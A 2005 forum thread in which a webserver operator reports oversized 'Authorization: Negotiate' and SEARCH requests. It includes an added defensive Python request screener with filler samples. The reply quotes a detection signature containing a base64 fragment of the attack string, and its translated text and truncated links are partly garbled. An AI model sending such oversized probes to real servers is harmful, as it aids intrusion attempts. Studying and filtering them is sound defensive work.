  #1 (permalink)  
Old 07-14-2005, 12:24 PM
yarmfelder@yahoo.com
Guest
 
Posts: n/a
Default webserver attack attempt

I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.

What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:

GET / HTTP/1.0
Authorization: Negotiate

.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH
....etc.

YF
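
The size and method checks described in the post above, as an added example that is not part of the original post and is not the poster's server code. The limits, the allowed-method list and the name `screen_request` are assumptions, and the sample requests are constructed filler rather than the captured traffic.

```python
# Added example: all limits and names here are assumptions, not the poster's server.
MAX_REQUEST_LINE = 2048                     # assumed cap on the request line, bytes
MAX_HEADER_VALUE = 1024                     # assumed cap on one header value, bytes
MIN_REQUEST_LINE = len(b"GET / HTTP/1.0")   # shortest well-formed request line
ALLOWED_METHODS = {b"GET", b"HEAD", b"POST"}


def screen_request(raw: bytes) -> list[str]:
    """Return the reasons to reject a raw HTTP request head (empty list = accept)."""
    reasons = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line = lines[0]

    # "Far too short" and "far too long" are both rejected before any parsing.
    if len(request_line) < MIN_REQUEST_LINE:
        reasons.append("request line too short")
    if len(request_line) > MAX_REQUEST_LINE:
        reasons.append("request line too long")

    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        reasons.append("malformed request line")
    if parts[0] not in ALLOWED_METHODS:      # e.g. SEARCH on a non-WebDAV server
        reasons.append("method not allowed")
    if any(c < 0x21 or c > 0x7E for c in request_line.replace(b" ", b"")):
        reasons.append("non-printable bytes in request line")

    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            reasons.append("malformed header")
            continue
        if len(value.strip()) > MAX_HEADER_VALUE:
            reasons.append("oversized header: " + name.decode("ascii", "replace").lower())
    return reasons


# Constructed samples shaped like the requests in the post (filler bytes only).
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "short": b"GET\r\n\r\n",
    "long_negotiate": b"GET / HTTP/1.0\r\nAuthorization: Negotiate " + b"A" * 4000 + b"\r\n\r\n",
    "search": b"SEARCH /" + b"\xff" * 4000 + b" HTTP/1.1\r\n\r\n",
}
```

Logging the returned reasons together with the source address gives a compact record of each probe without storing the oversized payload itself.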


  #2 (permalink)  
Old 07-14-2005, 03:11 PM
Newsgroup Poster
Guest
 
Posts: n/a
Default Re: webserver attack attempt

Hope this is of help:

http://translate.google.com/translat...D%26safe%3Doff


2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? " HTTP/1 " and " Authorization:
Negotiate " and
" YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaq ufbqufbquf "



http://216.239.59.104/search?q=cache...hl=en&start=10

